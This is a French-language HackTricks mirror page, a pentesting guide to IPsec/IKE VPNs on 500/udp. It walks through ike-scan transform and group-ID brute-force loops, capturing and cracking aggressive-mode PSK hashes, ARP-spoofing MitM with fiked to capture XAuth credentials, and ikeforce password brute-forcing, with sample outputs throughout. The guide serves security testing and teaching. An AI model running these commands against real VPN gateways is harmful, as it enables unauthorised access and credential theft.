Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/ipsec-ike-vpn-pentesting.md

20 KiB
Raw Blame History

500/udp - Test d'intrusion IPsec/IKE VPN

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Trouvez les vulnérabilités les plus importantes afin de les corriger plus rapidement. Intruder suit votre surface d'attaque, lance des analyses de menaces proactives, trouve des problèmes dans l'ensemble de votre pile technologique, des API aux applications web et aux systèmes cloud. Essayez-le gratuitement aujourd'hui.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

Informations de base

IPsec est la technologie la plus couramment utilisée pour les solutions VPN d'entreprise, à la fois de passerelle à passerelle (LAN à LAN) et d'hôte à passerelle (accès distant).

IKE est un type d'ISAKMP (Internet Security Association Key Management Protocol), qui est un cadre pour l'authentification et l'échange de clés. IKE établit l'association de sécurité (SA) entre deux points finaux à travers un processus en trois phases :

  • Phase 1 : Établir un canal sécurisé entre 2 points finaux en utilisant une clé pré-partagée (PSK) ou des certificats. Il peut utiliser le mode principal (3 paires de messages) ou le mode agressif.
  • Phase 1.5 : C'est facultatif, cela s'appelle Phase d'authentification étendue et authentifie l'utilisateur qui tente de se connecter (utilisateur+mot de passe).
  • Phase 2 : Négocie les paramètres de sécurité des données en utilisant ESP et AH. Il peut utiliser un algorithme différent de celui utilisé en phase 1 (Secret de session avancé (PFS)).

Port par défaut : 500/udp

Découvrez le service en utilisant nmap

root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)

Trouver une transformation valide

La configuration IPSec peut être préparée pour n'accepter qu'une ou quelques transformations. Une transformation est une combinaison de valeurs. Chaque transform contient un certain nombre d'attributs tels que DES ou 3DES comme algorithme de chiffrement, SHA ou MD5 comme algorithme d'intégrité, une clé pré-partagée comme type d'authentification, Diffie-Hellman 1 ou 2 comme algorithme de distribution de clé et 28800 secondes comme durée de vie.

La première chose à faire est de trouver une transformation valide, afin que le serveur puisse communiquer avec vous. Pour ce faire, vous pouvez utiliser l'outil ike-scan. Par défaut, Ike-scan fonctionne en mode principal et envoie un paquet à la passerelle avec un en-tête ISAKMP et une seule proposition contenant huit transformations à l'intérieur.

En fonction de la réponse, vous pouvez obtenir des informations sur le point de terminaison :

root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify

Comme vous pouvez le voir dans la réponse précédente, il y a un champ appelé AUTH avec la valeur PSK. Cela signifie que le VPN est configuré en utilisant une clé prépartagée (ce qui est vraiment bon pour un testeur d'intrusion).
La valeur de la dernière ligne est également très importante :

  • 0 handshake retourné; 0 notification retournée: Cela signifie que la cible n'est pas une passerelle IPsec.
  • 1 handshake retourné; 0 notification retournée: Cela signifie que la cible est configurée pour IPsec et est prête à effectuer une négociation IKE, et qu'une ou plusieurs des transformations que vous avez proposées sont acceptables (une transformation valide sera affichée dans la sortie).
  • 0 handshake retourné; 1 notification retournée: Les passerelles VPN répondent avec un message de notification lorsque aucune des transformations n'est acceptable (bien que certaines passerelles ne le fassent pas, auquel cas une analyse plus approfondie et une proposition révisée devraient être essayées).

Ensuite, dans ce cas, nous avons déjà une transformation valide, mais si vous êtes dans le 3ème cas, alors vous devez forcer un peu pour trouver une transformation valide :

Tout d'abord, vous devez créer toutes les transformations possibles :

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

Et ensuite effectuez une attaque par force brute sur chacun en utilisant ike-scan (cela peut prendre plusieurs minutes) :

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

Si la méthode de la force brute n'a pas fonctionné, peut-être que le serveur répond sans poignées de main même aux transformations valides. Ensuite, vous pourriez essayer la même méthode de force brute mais en utilisant le mode agressif :

while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt

Espérons qu'une transformation valide soit renvoyée.
Vous pouvez essayer la même attaque en utilisant iker.py.
Vous pourriez également essayer de forcer les transformations avec ikeforce:

./ikeforce.py <IP> # No parameters are required for scan -h for additional help

Dans Groupe DH : 14 = MODP 2048 bits et 15 = 3072 bits
2 = HMAC-SHA = SHA1 (dans ce cas). Le format --trans est $Enc,$Hash,$Auth,$DH

Cisco recommande d'éviter en particulier les groupes DH 1 et 2. Les auteurs de l'article décrivent comment il est probable que les États-nations puissent décrypter les sessions IPsec négociées en utilisant des groupes faibles via la précomputation des logs discrets. Les centaines de millions de dollars dépensés pour effectuer la précomputation sont amortis par le décryptage en temps réel de toute session utilisant un groupe faible (1 024 bits ou moins).

Fingerprinting du serveur

Ensuite, vous pouvez utiliser ike-scan pour essayer de découvrir le fournisseur du dispositif. L'outil envoie une proposition initiale et arrête de rejouer. Ensuite, il analyse la différence de temps entre les messages reçus du serveur et le modèle de réponse correspondant, le testeur d'intrusion peut identifier avec succès le fournisseur de passerelle VPN. De plus, certains serveurs VPN utiliseront la charge utile Vendor ID (VID) optionnelle avec IKE.

Spécifiez la transformation valide si nécessaire (en utilisant --trans)

Si IKE découvre quel est le fournisseur, il l'affichera :

root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify

Cela peut également être réalisé avec le script nmap ike-version

Trouver le bon ID (nom de groupe)

Pour être autorisé à capturer le hash, vous avez besoin d'une transformation valide prenant en charge le mode Aggressif et du bon ID (nom de groupe). Vous ne connaîtrez probablement pas le nom de groupe valide, donc vous devrez le brute-force.
Pour ce faire, je vous recommanderais 2 méthodes:

Brute-force de l'ID avec ike-scan

Tout d'abord, essayez de faire une demande avec un faux ID pour essayer de récupérer le hash ("-P"):

ike-scan -P -M -A -n fakeID <IP>

Si aucun hash n'est renvoyé, alors probablement cette méthode de force brute fonctionnera. Si un hash est renvoyé, cela signifie qu'un faux hash va être renvoyé pour un faux ID, donc cette méthode ne sera pas fiable pour la force brute de l'ID. Par exemple, un faux hash pourrait être renvoyé (cela se produit dans les versions modernes) :

Mais comme je l'ai dit, si aucun hash n'est renvoyé, vous devriez essayer de force brute les noms de groupe courants en utilisant ike-scan.

Ce script essaiera de force brute les IDs possibles et renverra les IDs où une poignée de main valide est renvoyée (ce sera un nom de groupe valide).

Si vous avez découvert une transformation spécifique, ajoutez-la dans la commande ike-scan. Et si vous avez découvert plusieurs transformations, n'hésitez pas à ajouter une nouvelle boucle pour les essayer toutes (vous devriez les essayer toutes jusqu'à ce que l'une d'elles fonctionne correctement).

Vous pouvez utiliser le dictionnaire d'ikeforce ou celui dans seclists des noms de groupe courants pour les force brute :

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

Bruteforcer l'ID avec Iker

iker.py utilise également ike-scan pour effectuer une attaque par force brute sur les noms de groupe possibles. Il suit sa propre méthode pour trouver un ID valide basé sur la sortie de ike-scan.

Bruteforcer l'ID avec ikeforce

ikeforce.py est un outil qui peut être utilisé pour forcer de manière brute les IDs également. Cet outil essaiera d'exploiter différentes vulnérabilités qui pourraient être utilisées pour différencier un ID valide d'un ID non valide (pouvant entraîner des faux positifs et des faux négatifs, c'est pourquoi je préfère utiliser la méthode ike-scan si possible).

Par défaut, ikeforce enverra au début quelques IDs aléatoires pour vérifier le comportement du serveur et déterminer la tactique à utiliser.

  • La première méthode consiste à forcer de manière brute les noms de groupe en recherchant les informations Dead Peer Detection DPD des systèmes Cisco (ces informations ne sont renvoyées que par le serveur si le nom de groupe est correct).
  • La deuxième méthode disponible consiste à vérifier le nombre de réponses envoyées à chaque tentative car parfois plus de paquets sont envoyés lorsque le bon ID est utilisé.
  • La troisième méthode consiste à rechercher "INVALID-ID-INFORMATION" en réponse à un ID incorrect.
  • Enfin, si le serveur ne renvoie rien aux vérifications, ikeforce tentera de forcer de manière brute le serveur et vérifiera si lorsque le bon ID est envoyé, le serveur renvoie un paquet.
    Évidemment, l'objectif de la force brute de l'ID est d'obtenir la PSK lorsque vous avez un ID valide. Ensuite, avec l'ID et la PSK, vous devrez forcer de manière brute le XAUTH (s'il est activé).

Si vous avez découvert une transformation spécifique, ajoutez-la dans la commande ikeforce. Et si vous avez découvert plusieurs transformations, n'hésitez pas à ajouter une nouvelle boucle pour les essayer toutes (vous devriez les essayer toutes jusqu'à ce que l'une d'elles fonctionne correctement).

git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library

./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic

Capture d'ID

Il est également possible d'obtenir des noms d'utilisateur valides en sniffant la connexion entre le client VPN et le serveur, car le premier paquet de mode agressif contenant l'ID du client est envoyé en clair (du livre Network Security Assessment: Know Your Network)

Capture et craquage du hash

ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor

Le hash sera enregistré à l'intérieur de hash.txt.

Vous pouvez utiliser psk-crack, john (en utilisant ikescan2john.py) et hashcat pour cracker le hash :

psk-crack -d <Wordlist_path> psk.txt

XAuth

La plupart des implémentations utilisent le mode agressif IKE avec un PSK pour effectuer une authentification de groupe, et XAUTH pour fournir une authentification utilisateur supplémentaire (via Microsoft Active Directory, RADIUS, ou similaire). Dans IKEv2, EAP remplace XAUTH pour authentifier les utilisateurs.

MitM du réseau local pour capturer les identifiants

Ainsi, vous pouvez capturer les données de connexion en utilisant fiked et voir s'il y a un nom d'utilisateur par défaut (Vous devez rediriger le trafic IKE vers fiked pour l'écoute, ce qui peut être fait à l'aide de l'usurpation ARP, plus d'informations). Fiked agira en tant que point de terminaison VPN et capturera les identifiants XAuth:

fiked -g <IP> -k testgroup:secretkey -l output.txt -d

Attaque de l'homme du milieu (MitM) et blocage du trafic sur le port 500

Aussi, en utilisant IPSec, essayez de réaliser une attaque de l'homme du milieu (MitM) et de bloquer tout le trafic vers le port 500. Si le tunnel IPSec ne peut pas être établi, il est possible que le trafic soit envoyé en clair.

Brute-forcing du nom d'utilisateur et du mot de passe XAUTH avec ikeforce

Pour effectuer une attaque de force brute sur le XAUTH (lorsque vous connaissez un nom de groupe valide id et la psk), vous pouvez utiliser un nom d'utilisateur ou une liste de noms d'utilisateurs et une liste de mots de passe :

./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]

De cette manière, ikeforce va essayer de se connecter en utilisant chaque combinaison nom d'utilisateur : mot de passe.

Si vous avez trouvé un ou plusieurs transforms valides, utilisez-les comme dans les étapes précédentes.

Authentification avec un VPN IPSEC

Dans Kali, VPNC est utilisé pour établir des tunnels IPsec. Les profils doivent être situés dans le répertoire /etc/vpnc/. Vous pouvez initier ces profils en utilisant la commande vpnc.

Les commandes et configurations suivantes illustrent le processus de configuration d'une connexion VPN avec VPNC :

root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0

Dans cette configuration :

  • Remplacez [VPN_GATEWAY_IP] par l'adresse IP réelle de la passerelle VPN.
  • Remplacez [VPN_CONNECTION_ID] par l'identifiant de la connexion VPN.
  • Remplacez [VPN_GROUP_SECRET] par le secret de groupe VPN.
  • Remplacez [VPN_USERNAME] et [VPN_PASSWORD] par les informations d'authentification VPN.
  • [PID] symbolise l'ID de processus qui sera attribué lorsque vpnc sera lancé.

Assurez-vous d'utiliser des valeurs réelles et sécurisées pour remplacer les espaces réservés lors de la configuration du VPN.

Matériel de référence

Shodan

  • port:500 IKE

Trouvez les vulnérabilités les plus importantes afin de les corriger plus rapidement. Intruder suit votre surface d'attaque, lance des analyses de menaces proactives, identifie les problèmes dans l'ensemble de votre pile technologique, des API aux applications web et aux systèmes cloud. Essayez-le gratuitement dès aujourd'hui.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks :